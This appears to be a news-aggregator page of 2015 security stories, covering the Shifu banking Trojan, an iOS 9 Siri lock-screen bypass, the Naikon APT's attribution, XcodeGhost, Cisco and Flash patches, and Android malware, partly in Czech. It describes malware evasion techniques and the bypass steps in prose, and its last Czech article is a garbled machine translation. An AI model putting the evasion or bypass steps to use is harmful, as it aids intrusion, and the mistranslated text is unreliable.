This post was prepared with the invaluable assistance of Rakesh Sharma.
In recent weeks, McAfee Labs has analyzed a recently discovered banking Trojan that combines elements from multiple malware tools. Shifu (“thief” in Japanese) has circulated since April, and attacks primarily Japanese banks.
This malware arrives as a file dropped by other malware or as a file downloaded unknowingly by users when visiting compromised sites. Upon installation the malware drops the following files:
%All Users Profile%\Application Data\{random}.tmp.bat
%Application Data%\{random characters}. Contains logs of running applications and accessed applications
It drops and executes the following files:
%All Users Profile%\Application Data\{random}.exe
The malware creates a run registry entry to execute itself every time Windows starts: HKCU\Software\Microsoft\Windows\CurrentVersion\RunIntelPowerAgent9 = rundll32.exe shell32.dll, ShellExec_RunDLL %All Users Profile%\Application Data\{random}.exe
Obscuring techniques
This recently discovered malware family makes use of a large arsenal of tricks to avoid being detected by traditional security solutions. It terminates itself if the computer name of the machine is SANDBOX or FORTINET.
It terminates itself if any of the following files are found:
The following image shows the malware searching for c:\sample\pos.exe.

The malware terminates if it is being debugged. The IsDebuggerPresent API detects if the program is being debugged and if it is, the malware can change its behavior. (We commonly find this API in malware samples.) Using these techniques, the malware developers are trying to make the malware analyst’s task more difficult. Shifu also uses the sleep API, which can set the application to sleep for an infinite amount of time.



Shifu can also check for antiautomation. Generally, in a normal system the foreground window changes when the user switches between tasks. In an automation system, though, there is usually only a single task running a possibly malicious sample and monitoring its behavior. The malware makes cunning use of this difference between the two types of systems. First, it checks by calling GetForegroundWindow() and saves the handle of the window. After that it checks whether the foreground window has changed by continuously calling the same function. The rest of the code won’t be executed until the window has changed.

Injecting asynchronous procedure calls
Thread creation usually requires overhead, so malware often use asynchronous procedure call injection, which can invoke a function on a current thread. These calls can direct a thread to execute some other code prior to executing its regular execution path. The malware checks running processes on infected systems via the CreateToolhelp32Snapshot method that PoS RAM scrapers commonly use. In the following snapshot we can see the malware targeting code by looking for API calls such as Createtoolhelp32snapshot (takes a snapshot of the specified processes, as well as the heaps, modules, and threads used by these processes), Process32First, and Process32next to find the target process. The malware retrieves all processes lists and saves them in its own memory. One of the injected malicious code threads is responsible for periodically scraping the memory of active non–system processes on the infected machine for credit card information.

The malware uses HTTP POST requests to exfiltrate the stolen data it scrapes and sends it to a control server. The stolen information is then relayed back to the control server. Here malware injects code into one of the two running process, explorer.exe and csrss.exe.
Shifu uses the domain generation algorithm to create random domain names for covert botnet communications. Here’s a look at the traffic, which shows the generated random domain names:

The malware uses mailslot for one-way interprocess communications between processes both locally and over a network. It can also store the track information and stolen data in mailslot and send the data to its control server using a POST request.

Shifu retrieves the path of the currently running executable by GetModuleFileName call. The GetModuleFileName call is needed because the malware may not know its directory or filename. By dynamically obtaining this information the malware can install the service no matter which executable is called or where it is stored.

The malware uses SHGetValueA to get a value from an open registry key or from a named subkey.

As usual, the unpacked code is injected in the newly remapped memory.

The malware sends the victim’s version info, PC name, GUID, etc. through HTTP Post to the remote server. A code snippet:
This is just the tip of the iceberg. As we dig deeper into this malware and unearth more we will update you.

iOS 9 security flaw lets attackers access device through Siri

A major security flaw has been identified in the latest version of Apple’s mobile operating system, iOS 9.
It was highlighted by an individual known as Jose Rodriguez, who posted a proof-of-concept video on YouTube (which you can view below).
In it he revealed that cybercriminals are able to exploit a fundamental weakness in iOS 9, which allows them to gain access to a device via Siri.
Mr Rodriguez, whose background and occupation remains unclear, demonstrates as much in the video.
He begins by entering the incorrect passcode, which he repeats three more times (he shows beforehand what the actual passcode is).
On the fifth attempt, however, before he can be locked out, he quickly holds down on the home button after typing in the last digit.
SiriIMG_3777 (1)
This brings up Siri and he then asks, in Spanish, what time it is. The voice-activated personal assistant responds to this prompt by bringing up the device’s inbuilt clock.
After tapping on the clock and then pressing the + icon, Mr Rodriguez is presented with search capabilities, from which he can gain entry into iMessages.
Now he can view any of the contacts stored on the smartphone, including profile pictures, numbers and additional information like emails and addresses.
He also shows how an attacker can browse through a user’s photographs by adding a profile.
While access to other parts of the device remain off-limits, this nevertheless offers cybercriminals access to sensitive information, which can be used to their advantage.
Apple has since been notified of the vulnerability. In the interim of another security update to iOS 9, Mr Rodriguez advises users to disable Siri.
This is an interesting find, as Apple has pitched iOS 9 as one of the most secure operating systems around.
The latest edition comes with enhanced features, including a stronger passcode and a revamped two-factor authentication process (2FA).

Naikon APT Group backed by the Chinese PLA Unit 78020

According a new report the popular Naikon APT group is actually backed by the China’s PLA Unit 78020, a firm traced it through online activity.
Ge Xing, also known as “GreenSky27,” is the name of a the alleged member of the People’s Liberation Army unit 78020, a group of Chinese state-sponsored hackers. The man was identified by a joint investigation conducted by the ThreatConnect and Defense Group Inc, Ge Xing and his colleagues gather intelligence from political and military sources to advance China’s interests in the South China Sea.

“ThreatConnect, in partnership with Defense Group Inc., has attributed the targeted cyber espionage infrastructure activity associated with the ‘Naikon‘ Advanced Persistent Threat (APT) group to a specific unit of the Chinese People’s Liberation Army (PLA),” the security intelligence firm explains. “Our assessment is based on technical analysis of Naikon threat activity and native language research on a PLA officer within Unit 78020,”

The publication of the findings of the investigation coincides with the official visit of the Chinese President Xi Jinping in the US, he is firmly denying any involvement of the Chinese Government in cyber espionage campaigns recently uncovered by security firms.


The control over the South China Sea is strategic for the Chinese Government due to the intense commercial activity in the area.

“The South China Sea is seen as a key geopolitical area for China,” explained Dan Alderman, deputy director of DGI. “With Naikon, we see their activity as a big element of a larger emphasis on the region and the Technical Reconnaissance Bureau fitting into a multisector effort to influence that region.”

A report published by the ThreatConnect and Defense Group Inc. links the PLA 78020 to the Naikon APT group, which is one of the Asian largest APT gangs that has been active for several years. The missions of the Naikon APT targeted entities in various industries including governments and the military, the hacking crew targeted diplomats, law enforcement, and aviation authorities in many Asian countries such as the Philippines, Malaysia, Cambodia, and Indonesia. Naikon is the group which was involved in a cyber espionage campaign shortly after Malaysia Airlines Flight MH370 disappeared. Recently the group engaged a hacking dispute with another APT dubbed Hellsing.

In May, Kaspersky Lab published a detailed report on the Naikon APT group and its cyber espionage operations. According to the experts the group uses advanced hacking tools.

The Naikon APT group carried out surgical spear phishing attacks against its targets, the hackers relied on Word or Office documents to trigger a buffer overflow in the ActiveX controls of a MSCOMCTL.OCX Windows library (CVE-2012-0158).

The exploit allows attackers to infect victims with RAT and establish a backdoor on the victim’s system.

Ge is not described as a simple military but as an academic. The researchers discovered that his location is the headquarters of the PLA technical reconnaissance bureau by analyzing his online activity.

Naikon APT PLA 3

“Doing this kind of biopsy, if you will, of this threat through direct analysis of the technical and non-technical evidence allows us to paint a picture of the rest of this group’s activity,” said Rich Barger, CIO and cofounder of ThreatConnect. “We’ve had hundreds of hashes, hundreds of domains, and thousands of IPs [related to PLA unit 78020]. Only looking at this from a technical lens only gives you so much. When you bring in a regional, cultural and even language aspect to it, you can derive more context that gets folded over and over into the technical findings and continues to refine additional meaning that we can apply to the broader group itself.”

The report also detailed a series of operational security mistakes made by Ge, such as embedding certain names in families of malware attributed to Naikon APT group. The Naikon group and elite PLA unit appears very close.

“If you look at where China is and how assertive they are in region, it might be a reflection of some of the gains and wins this group has made,” Barger said. “You don’t influence what they’re influencing in the region if you don’t have the intel support capabilities fueling that operational machine.”

Naikon APT PLA 2

Below are reported Key findings from the investigation.

Analysis of historic command and control (C&C) infrastructure used consistently within Naikon malware for espionage operations against Southeast Asian targets has revealed a strong nexus to the city of Kunming, capital of Yunnan Province in southwestern China.
The C&C domain “greensky27.vicp[.]net” consistently appeared within unique Naikon malware, where the moniker “greensky27” is the personification of the entity who owns and operates the malicious domain.
Further research shows many social media accounts with the “greensky27” username are maintained by a People’s Republic of China (PRC) national named Ge Xing (葛星), who is physically located in Kunming.


Cisco Patches Denial-of-Service, Bypass Vulnerabilities in IOS

Cisco pushed out on Wednesday its usual semiannual round of patches for IOS, the software the company uses for most of its routers and switches.

This month’s security advisories addressed four vulnerabilities, three which could lead to denial of service situations, and another that could have let an attacker bypass user authentication.

The bypass vulnerability stemmed from an improper implementation of the SSH version 2 protocol on IOS and IOS XE software. If exploited, an attacker – assuming they knew a legitimate username configured for RSA-based user authentication, and the public key for the user – could log in with the privileges of that user. Cisco stresses that this is merely a bypass vulnerability in IOS, not a situation where the attacker would be able to escalate privileges.

Since the bug only affects RSA user authentication, endusers could disable the functionality to mitigate it, or simply apply the patch.

The denial of service vulnerabilities largely stem from issues in IPv4 and IPv6 is handled by the software.

One is the result of improper processing of IPv4 packets that require Network Address Translation (NAT) and Multiprotocol Label Switching (MPLS) processing – if an unauthenticated, remote attacker sent the right IPv4 packet they could cause a device reload. Another two are in the IPv6 snooping security feature in IOS and IOS XE – if attackers sent a malformed packet, or a flood of traffic, they could also cause a device to reload.

The patches are the first for the software in six months, as Cisco patches IOS in bundles, twice a year, in March and September.

Last month the company warned its enterprise customers that attackers were attempting to exploit IOS devices. Hackers weren’t exploiting any specific vulnerability, they were apparently using valid credentials, uploading malicious ROMMON images, and gaining persistent access to the devices.

Naikon APT Group Tied to China’s PLA Unit 78020

Chinese president Xi Jinping is supposed to have dinner this evening with U.S. president Barack Obama. Wonder if the name Ge Xing will come up?

Ge Xing is the subject of a joint report published this morning by ThreatConnect and Defense Group Inc., computer and national security service providers respectively. Ge is alleged to be a member of the People’s Liberation Army unit 78020, a state-sponsored hacking team whose mission is to collect intelligence from political and military sources to advance China’s interests in the South China Sea, a key strategic and economic region in Asia with plenty of ties to the U.S.

The report connects PLA 78020 to the Naikon advanced persistent threat group, a state-sponsored outfit that has followed the APT playbook to the letter to infiltrate and steal sensitive data and intellectual property from military, diplomatic and enterprise targets in a number of Asian countries, as well as the United Nations Development Programme and the Association of Southeast Asian Nations (ASEAN).

Control over the South China Sea is a focal point for China; through this region flows trillions of dollars of commerce and China has not been shy about claiming its share of the territory. The report states that China uses its offensive hacking capabilities to gather intelligence on adversaries’ military and diplomatic intentions in the regions, and has leveraged the information to strengthen its position.

“The South China Sea is seen as a key geopolitical area for China,” said Dan Alderman, deputy director of DGI. “With Naikon, we see their activity as a big element of a larger emphasis on the region and the Technical Reconnaissance Bureau fitting into a multisector effort to influence that region.”

The report is just the latest chess piece hovering over Jinping’s U.S. visit this week, which began in earnest yesterday with a visit to Seattle and meetings with giant technology firms such as Microsoft, Apple and Google, among others. Those companies want to tap into the growing Chinese technology market and the government there is using its leverage to get them to support stringent Internet controls imposed by the Chinese government.

A letter sent to American technology companies this summer, a New York Times report last week, said that China would ask American firms to store Chinese user data in China. China also reportedly asked U.S.-built software and devices sold in China to be “secure and controllable,” which likely means the Chinese would want backdoor access to these products, or access to private encryption keys.

Jinping, meanwhile, tried to distance himself from the fray when he said in a Wall Street Journal interview: “Cyber theft of commercial secrets and hacking attacks against government networks are both illegal; such acts are criminal offences and should be punished according to law and relevant international conventions.”

Journal reporter Josh Chin connected with Ge Xing over the phone and Ge confirmed a number of the dots connected in the report before hanging up on the reporter and threatening to report him to the police. While that never happened, the infrastructure connected to Ge and this slice of the Naikon APT group, was quickly shut down and taken offline.

In May, researchers at Kaspersky Lab published a report on Naikon and documented five years of activity attributed to the APT group. It describes a high volume of geo-politically motivated attacks with a high rate of success infiltrating influential organizations in the region. The group uses advanced hacking tools, most of which were developed externally and include a full-featured backdoor and exploit builder.

Like most APT groups, they craft tailored spear phishing messages to infiltrate organizations, in this case a Word or Office document carrying an exploit for CVE-2012-0158, a favorite target for APT groups. The vulnerability is a buffer overflow in the ActiveX controls of a Windows library, MSCOMCTL.OCX. The exploit installs a remote administration tool, or RAT, on the compromised machine that opens a backdoor through which stolen data is moved out and additional malware and instructions can be moved in.

Chin’s article describes a similar attack initiated by Ge, who is portrayed not only as a soldier, but as an academic. The researchers determined through a variety of avenues that Ge is an active member of the military, having published research as a member of the military, in addition to numerous postings to social media as an officer and via his access to secure locations believed to be headquarters to the PLA unit’s technical reconnaissance bureau.

“Doing this kind of biopsy, if you will, of this threat through direct analysis of the technical and non-technical evidence allows us to paint a picture of the rest of this group’s activity,” said Rich Barger, CIO and cofounder of ThreatConnect. “We’ve had hundreds of hashes, hundreds of domains, and thousands of IPs [related to PLA unit 78020]. Only looking at this from a technical lens only gives you so much. When you bring in a regional, cultural and even language aspect to it, you can derive more context that gets folded over and over into the technical findings and continues to refine additional meaning that we can apply to the broader group itself.”

The report also highlights a number of operational security mistakes Ge made to inadvertently give himself away, such as using the same handle within the group’s infrastructure, even embedding certain names in families of malware attributed to them. All of this combined with similar mistakes made across the command and control infrastructure and evidence pulled from posts on social media proved to be enough to tie Ge to the Naikon group and elite PLA unit that is making gains in the region.

“If you look at where China is and how assertive they are in region, it might be a reflection of some of the gains and wins this group has made,” Barger said. “You don’t influence what they’re influencing in the region if you don’t have the intel support capabilities fueling that operational machine.”

Straší fakturami, pak důvěřivce oberou

24.9.2015 Podvod
Kyberzločinci oprášili starý trik, kdy se snaží propašovat do cizího počítače škodlivý virus pod záminkou neuhrazené faktury. Před podvodnými e-maily, kvůli kterým může z účtů důvěřivců zmizet klidně i několik stovek tisíc korun, varoval Národní bezpečnostní tým CSIRT, který je provozován sdružením CZ.NIC.
„Tady je ta faktura, která měla být vystavena bez DPH. Tímto bych se s Vámi chtěla domluvit, zda mohu fakturu pouze stornovat a vystavit novou, nebo zda je třeba vystavit dobropis,“ tvrdí podvodníci v nevyžádaném e-mailu.

Podvodníci sázejí na to, že uživatelé nebudou mít sebemenší tušení, o jakou fakturu se jedná. Ze strachu z případných oplétaček pak kliknou na přiloženou přílohu. V té se však kromě smyšleného dokumentu ukrývá také počítačový virus.

„E-mail od známého či neznámého kontaktu obsahuje nebezpečnou přílohu pojmenovanou faktura.doc o velikosti 236K. Tato příloha obsahuje vbscript pro stažení malwaru,“ uvedl Pavel Bašta, bezpečnostní analytik týmu CSIRT.

Na přílohu by tak lidé v žádném případě neměli klikat.

Lidé už přišli o statisíce
Jak dokážou být podobné zprávy nebezpečné, se na vlastní kůži přesvědčila pětatřicetiletá žena ze Šumperska. Té letos v březnu dosud neznámý pachatel zaslal do e-mailové schránky formulář vyzývající k synchronizaci jejího účtu s mobilním telefonem. 

„Postupovala podle přiloženého návodu a provedla synchronizaci telefonu a svého osobního počítače. Takto podvodník získal přístup k jejímu bankovnímu účetnictví a poté ve dvou bankovních převodech připravil ženu o téměř 400 tisíc korun,“ řekl policejní mluvčí Josef Bednařík.

Podobné útoky přitom nejsou nijak výjimečné. Podnikatel z Náchodska letos kvůli podobnému e-mailu přišel také o několik set tisíc korun.

Děravý jako ementál. Adobe musí opravit desítky bezpečnostních chyb ve Flash Playeru

24.9.2015 Zranitelnosti
Společnost Adobe vydala aktualizaci, v rámci které opravuje více než dvě desítky chyb programu Flash Player. Trhliny v aplikaci, kterou používají k přehrávání videí na internetu desítky miliónů lidí po celém světě, mohou útočníci zneužít k ovládnutí cizího počítače. Upozornil na to server The Hacker News.
„Společnost Adobe vydala 23 bezpečnostních záplat pro Flash Player. Bezpečnostní záplaty opravují kritické chyby, které mohou potenciálně umožnit útočníkovi převzít kontrolu nad dotčeným systémem,“ varoval Pavel Bašta, analytik Národního bezpečnostního týmu CSIRT.CZ, který je provozován sdružením CZ.NIC.

Chyby se týkají uživatelů, kteří používají Flash Player v operačních systémech Windows, Linux a Mac OS X od Applu.

Prostřednictvím nalezených trhlin mohou počítačoví piráti propašovat do dotčeného operačního systému prakticky libovolný škodlivý kód. Mohou tak uživatele šmírovat, dostat se k uloženým datům na disku, nebo se jednoduše zmocnit celého systému na dálku.

S instalací aktualizace by tak lidé neměli rozhodně otálet. Stahovat ji je možné buď prostřednictvím automatických aktualizací, nebo přímo z webových stránek společnosti Adobe.

Apple's Biggest Hack Ever: 4000 Malicious iOS Store Apps Linked to CIA?

The First major cyber attack on Apple's App Store has now been linked to CIA (Central Intelligence Agency).
Last week, Researchers disclosed some 39 iOS apps on Apple's App Store infected by 'XCodeGhost Malware'. The Bad News is that the infection has now increased exponentially with the discovery of more than 4,000 infected apps.
The XCodeGhost malware was distributed through legitimate iOS Apps via counterfeit versions of Apple's app developer toolkit called Xcode.
XcodeGhost is a very harmful and dangerous piece of malware that is capable to Phish credentials, infect other apps, Hijack URLs, Steal iCloud passwords from your device and then upload them to the attacker's servers even without your knowledge.
After Apple had removed nearly 300 malware-ridden iOS apps from the App Store, FireEye researchers found more than 4,000 compromised apps.
The infected apps include the popular instant messaging app WeChat, Chinese Uber-like cab service Didi Kuaidi, photo editor Perfect365, music streaming service NetEase, and card scanning tool CamCard, were found to be infected by the malicious Xcode.
But Where Does the CIA Come into Picture?
The technique used by XCodeGhost is similar to that developed by Central Intelligence Agency (CIA) researchers and reported by The Intercept in March this year, citing the documents leaked by Edward Snowden.
The leaked documents claimed that CIA detailed a way to manipulate Xcode in an effort to add backdoors into iOS apps even without the knowledge of the developers.
The iOS apps built using the modified version of Xcode could enable spies to steal passwords and grab messages from the infected devices, as well as send that data to a command center of their choice.
The documents didn't make it clear how CIA and other intelligence agencies would "get developers to use the poisoned version of Xcode."
But, now we know How?
The answer could be XCodeGhost, which has very similar capabilities that of CIA approach, as well as the way their approach infects iOS apps also matches the one used by XcodeGhost.
Apple has ensured its customers that the company is working to remove these infected apps from its App Store, but it has not yet responded to questions about whether Apple was aware of the CIA techniques for compromising Xcode.

Firefox 41 integrates Free Built-in Instant Messaging and Video Chat to Your Browser

Mozilla launches Voice and Video Connect with the release of Official Firefox 41.0 Release.
After significant improvements done in the Firefox Nightly experimental build of version Firefox 41.0, the stable release has a lot to offer.
How would it be experiencing a seamless communication – video and voice calls and text messaging being directly built in your browser?
Here's How:
Mozilla has launched the stable release of Firefox 41.0, equipped with project "Firefox Hello" offering free VOIP and instant messaging services through WebRTC (Real Time Communication) channel.
Firefox Hello had already arrived last year via Firefox 41.0 Beta release with an aim of improving user’s experience by providing them with free voice and video calling features, irrespective of additional software or hardware support.
By adopting Firefox Hello:
Both the parties don't need to have same browsers, software or hardware.
No sign-up other than a logged-in Firefox account required for the communication.
Sending and receiving Instant messaging simultaneously working with video calling in Firefox for Windows, Mac and Linux.
Enabling Screen sharing, by the persons in communication.
Enabling Contacts integration if both the parties use different browsers.
This stable release has not been released for desktops versions alone; it is supporting the Android operating system as well.
WebRTC technology is such, which enables browser-based real-time communications without any transmission delays. It comes with features like:
Allowing the smooth flow of communication by ditching download of any additional plugins.
Using robust encryption methods.
Saving costs.
The services included in Firefox Hello can be availed of when your system is running with a browser (Firefox, Chrome, Safari, Edge or Opera) updated with WebRTC support.
Along with Firefox Hello, many other notable updates and features come with Firefox 41.0, such as setting up a profile picture for Firefox account and fixing up security issues to name a few.
Browser-based security issues cannot be neglected at the same time. As with the launch of any new technology, people with malicious intent will always look the picture from the other side to break in.

Google Drive security boost for paying customers

Organizations that pay to use Google Drive will benefit from a raft of new security features, it has been announced.
The tech giant said that this is part of its “ongoing commitment” to provide enterprises with productive and safe work-related solutions.
And with more organizations signing up to Google for Work – one million paying customers as of this year – the company is under even greater pressure to deliver a secure and effective product.
In an official blog, Scott Johnston, director of product management for Google Drive, said that these developments will make Google Drive “the safest place for all of your work”.
He highlighted three areas that have undergone a significant revamp – a new standard for privacy has been introduced; eDiscovery capabilities have been transformed; and mobile device management features have been updated.
The latter is in recognition of the fact that the nature of work has changed significantly over the last few years, with more organizations advocating the use of mobile devices like smartphones and tablets.
Employers are also now able to encrypt devices, scrutinize usage and enforce strong passwords, the expert stated. They will also be able to wipe all data in the event of a device being stolen or lost.
As for privacy, Google has added the new ISO/IEC 27018:2014 privacy standard to its compliance framework.
Mr Johnston explained: “This audit validates our privacy practices and contractual commitments to our customers, verifying for example that we don’t use your data for advertising, that the data that you entrust with us remains yours and that we provide you with tools to delete and export your data.”

Criminals, Linguistics, Literacy and Attribution

In an article I wrote recently for Infosecurity Magazine – Spelling Bee (Input from the Hive Mind – I touched on the topic of textual analysis (in a rather loose sense).
This was in response to some comments implying that it’s a good indicator of scamminess when a message uses US or UK spellings inappropriate to the region from which it’s supposed to originate. The main thrust of that part of my article was that the use of the -ize or -ise suffixes is not as cut and dried as some spelling and style checkers would have you believe, and that the use of Americanisms is not an infallible guide to origin in the 21st century. However much some of us might regret their encroachment into UK English…
In fact, the pseudo-French replacement of all instances of –ize with –ise is a fairly recent publishing fad with which many writers and publishers in the UK have never chosen to conform. And, of course, with the globalization of many commercial entities, it’s not uncommon for many people in many countries whose first language is not English to learn the language from US-oriented sources, and that may also influence a company’s regional preference, linguistically speaking.
A Spelling Bee searching for its dictionary
Indeed, while poor English (of whatever regional variety) is often a clue that Something Is Phishy, even august financial institutions might sometimes slip up, or use unexpected regional idioms.
One point I made, however, was that ‘impeccable presentation doesn’t prove legitimacy‘ and that other cues and clues may be more reliable.
While the recent report in The Register of two men arrested in connection with the CoinVault ransomware doesn’t provide any information related to phish-type social engineering and linguistic manipulation, it’s interesting to see that part of the case against these suspects seems to be based on the inclusion of phrases in ‘perfect Dutch’ sprinkled throughout the binary, indicating a Dutch connection.
I don’t have any privileged information about the case, and no reason at all to believe that the Dutch NHTCU’s conclusions aren’t justified. It is worth bearing in mind, though, that in general anti-malware analysts are careful to avoid drawing ‘authoritative’ forensic conclusions: in particular about attribution of the origin of malicious activity on the basis of linguistics, cultural references, timestamps and other attributes that might be provide useful clues, but might also be deliberately introduced to mislead analysts for political or other reasons. Irritating as that caution may be to journalists and others sometimes, there are often good reasons for it.

7 years of Android: A painful journey to world dominance

android-wallpaper5_2560x1600Exactly seven years ago to the day (September 23rd), Google, after much speculation, finally lifted the lid on its secret project, one which would go onto change the mobile world. Despite the rumors, it wasn’t a brand new smartphone – it was so much more. What it brought to the table was a completely new operating system, which would, in just a few years, become the most dominant force in the mobile and smartphone market. Its name? Android.
However, it has to be said that all that success didn’t happen without some notable security glitches and slips along the way, and a few of the most notable ones have been quite recent, in fact. To begin then, let’s go back to the summer of 2013 when a gaping security hole, know as the Android Master Key exploit, was revealed.
Practically making all devices running the operating system vulnerable, Android Master Key allowed attackers to modify installation packages (Android Application Package – APK), meaning that device systems were unable to detect the changes. The risk? Legitimate apps could potentially be turned into malicious trojans.
Another giant slip came to light just a few months ago, in July 2015. Known as Stagefright, this bug could threaten as much as 95 percent of all Android devices on the planet – meaning almost a billion devices in real numbers. Only one MMS sent by a cybercriminal could result in you losing control over your device – even if you didn’t read or open it.
As an open-source based system ­– and one of the most popular ­– Android also made headlines thanks to the rise of many malware threats. Recently, a lock-screen-type ransomware was reported to be making its rounds across the US. Detected as Android/Lockerpin.A, the fraudsters behind this attack have been demanding $500 for unlocking a victim’s device.
Another example is extremely recent ,with ESET researchers reporting a new threat just yesterday (September 22nd). Dubbed Android/Mapin, this stealth attack, which is directed towards Android users, exploits popular arcade games such as Plants vs Zombies, Candy Crush or Super Hero Adventure by delivering a backdoor trojan directly onto a user’s smartphone or tablet.
With help of this malicious code, an attacker can take control of the device and make it part of a botnet. In the example discovered by ESET, it was observed that the trojan was also using a timer, allowing it to delay the execution of a malicious payload. This meant it was able to stay under the radar and, consequently, any odd behavior that the device was demonstrating was put down to the game.
What is alarming about Android/Mapin is the fact that all of this was found to be possible using downloadable apps from the official Google Play store. According to ESET telemetry, most of the infections were detected in India, currently constituting over 73 percent of all detections.
As Android’s short but remarkable existence clearly documents, the most widely used OS still has its weaknesses and remains a clear target for cybercriminals. That’s the problem with popular operating systems and devices – they attract the attention of attackers, just as as much as they do intrepid developers and users. So, if you want to celebrate seven years of the platform, follow these eight simple rules which will help you stay safe:
Always update your device’s operating system and apps to the latest available version
Back up all (or at least the most valuable) data on your device
Use up-to-date security solutions by a reputable vendor
Stick to the official Google Play store, where the likelihood of malware infection is the lowest (even though as Android/Mapin proves, apps are still checked by Google itself and sometimes analyzed by security vendors)
If however you are required to use third party apps, only do so if the source is trustworthy (e.g. your employer)
Use screen lock and remember ‘pattern is less secure than a PIN’ and a password is your best choice
Encrypt the contents of your device
Try to avoid rooting the device, no matter how tempting this option might be.

Global information security spend grows by 5% in 2015

Total global spend on information security will have increased by 4.7 percent by the end of 2015, taking the figure to $75.4 billion.
This is according to new analysis from Gartner, which stated that the boost in spending can be attributed to a number of factors including increased legislation, more government initiatives and as a result of high-profile data breaches.
All of the above underscores the seriousness of cybercrime, be it from the point of view of an individual, organization or government.
“Interest in security technologies is increasingly driven by elements of digital business, particularly cloud, mobile computing and now also the Internet of Things, as well as by the sophisticated and high-impact nature of advanced targeted attacks,” commented Elizabeth Kim, a research analyst at Gartner.
Gartner’s forecast for information security spend comes on the back of a new study from Grant Thornton International Ltd, which noted that cyberattacks are “taking a serious toll” on businesses across the globe.
The Grant Thornton International Business Report found that the total cost of cybercrime internationally for the last 12 months was $315 billion (approximately £200 billion).
Manu Sharma, head of cyber security and resilience at Grant Thornton UK LLP, said that such attacks represent a “significant danger” to all businesses.
“Not just the costs in terms of financial penalties, but serious reputational damage and loss of customers and business can be inflicted if attacks undermine customer confidence,” he elaborated.
“Despite this, some firms still lack a strategy to deal with cyberthreat or even understand the risks to their organization.”
The expert went on to say that enterprises need to stay ahead of the curve of cybercrime if they are to continue to thrive and remain secure from such threats.
“Cyber attacks can strike without warning and sometimes without the victim being immediately aware,” he added, concluding that in the digital age, preeminent levels of security and privacy are demanded by customers at all times.

90% of large businesses in the UK experienced data breach

The UK government has called on all businesses in the country to protect themselves from the growing threat of cybercrime.
Ed Vaizey, minister for culture and the digital economy, said that while many enterprises are “reaping the benefits” of being online, no organization is immune to the menace of cyberattacks.
As an example, he stated that in 2014 alone, 74 percent of small businesses and 90 percent of major businesses had experienced a data security breach.
Mr Vaizey, who was speaking at the Financial Times Cyber Security Summit Europe 2015, explained that the government itself is also making a concerted effort to protect the UK from cybercrime.
For example, he announced at the event that a new £500,000 fund has been set up specifically for colleges and universities to enhance the nation’s cyber prowess.
This will, he said, help them develop innovative teaching methods and more engaging learning environments that will, in turn, produce the cybersecurity skills needed to protect everyone in the UK today and in the future.
“Good cybersecurity underpins the entire digital economy – we need it to keep our businesses, citizens and public services safe,” commented Mr Vaizey.
“The UK is a world leader in the use of digital technologies but we also need to be a world leader in cybersecurity.
“Trust and confidence in UK online security is crucial for consumers, businesses and investors. We want to make the UK the safest place in the world to do business online.”
The UK government’s announcement comes on the back of new data that suggests businesses in the country are more at risk of a cyberattack than their international counterparts.
ThreatMetrix found that British enterprises have been attacked more than double the number of times as those in the US. Financial institutions were reported as being the number one target.
Worryingly, the UK is now also the “the second highest originator” of cybercrime in the world. The US remains number one.

Android trojan kapky, přes Google Bouncer
24.9.2015 Mobil

Nedávno jsme se na ESET objevil zajímavou stealth útok na uživatele Android, což je aplikace, která je pravidelná hra, ale s jednou zajímavou navíc: byla aplikace v balíku s jinou aplikací s názvem systemdata nebo resourcea, a to je určitě trochu podezřele. Proč by pravidelné hru stáhnout z oficiálních Google Play přijít s jinou aplikací s názvem systemdata? Tento konkrétní aplikace / hra od Google Play Store rozhodně není aplikace systému, jak již název zdá v úmyslu navrhnout.
Zabalený Aplikace je zrušen tiše na zařízení, ale musí požádat uživatele o skutečně nainstalovat. Aplikace požadující instalace se maskovat jako app za "správu nastavení". Po instalaci aplikace běží na pozadí jako služba.
ESET detekuje hry, které nainstalovat Trojan jako Android / TrojanDropper.Mapin a Trojan samotné jako Android / Mapin. Podle našich telemetrii, Android uživatelé v Indii jsou v současné době nejvíce postiženy, s 73.58 procent těchto zjištěných pozorovaných.
Je to backdoor Trojan, který převezme kontrolu vašeho zařízení a dělá z něj součást botnetu pod kontrolou útočníka. Trojan nastaví časovače, že zpoždění spuštění škodlivého užitečného zatížení. To je, aby bylo méně zřejmé, že trojanised hra je zodpovědný za podezřelé chování. V některých variantách tohoto infiltrace, nejméně tři dny musí uplynout před tím, než dosáhne plnou malware Trojan funkčnost. Je to asi toto zpoždění, které umožnilo TrojanDownloader dostat přes Bouncer systému prevence malware Google.
Po tom, Trojan požaduje práva správce zařízení a začne komunikovat s dálkovým C & C serveru. Android / Mapin obsahuje více funkcí, jako je například tlačení různých oznámení, stahování, instalaci a spouštění aplikací, a získávání soukromých informací uživatele, ale jeho hlavním účelem se zdá být zobrazení fullscreen reklamy na infikovaného zařízení.
Distribuční vektory: Google Play & Co.
Nejzajímavější věc, o této Android Trojan, je, že to bylo k dispozici ke stažení na stránkách oficiálního Google Play Store do konce roku 2013 a 2014, jak do vrchu závodní hru, Rostliny vs zombie 2, Subway trpí, Traffic Racer, Temple Run 2 Zombies a super hrdina dobrodružství vývojáři TopGame24h, TopGameHit a SHSH. Malware byl nahrán na Google Play listopadu 24-30, 2013 a 22. listopadu 2014.
Podle MIXRANK, Rostliny vs zombie 2 měl více než 10.000 ke stažení, než to bylo vytáhl. Na stejné datum System Optimizer, Zombie Tsunami, kocour diskuse, super hrdina dobrodružství, klasické cihla hry a aplikace uvedené dříve z Google Play Store, balený se stejným backdoor, byly nahrány do několika alternativních Android trzích stejnými vývojáři.
Stejný backdoor Bylo také zjištěno, baleny s jinými aplikacemi nahranými vývojářem PRStudio (nikoli prStudio) o alternativních Android trzích s některými z nich odkazování na oficiální Google Play Store. Tento developer Nahrál nejméně pět dalších Trojanized aplikace: Candy rozdrcením nebo Jewel rozdrtit, Závodní soupeři, Super Maria cesta, Zombie silnice vrah, Plants vs Zombies na různé Android trhy třetích stran. Všechny tyto infikované hry jsou stále k dispozici ke stažení z těchto trhů. Infikované aplikace byly staženy tisíckrát.
Aplicaciones infectadas por un troyano

Aplicaciones infectadas por un troyano
Obrázek 1: Infected aplikace

Obrázek 2: Použití získává pozitivní zpětnou vazbu
Infekce: Oběti jsou vyzváni k instalaci škodlivého softwaru 24 hodin po popravě
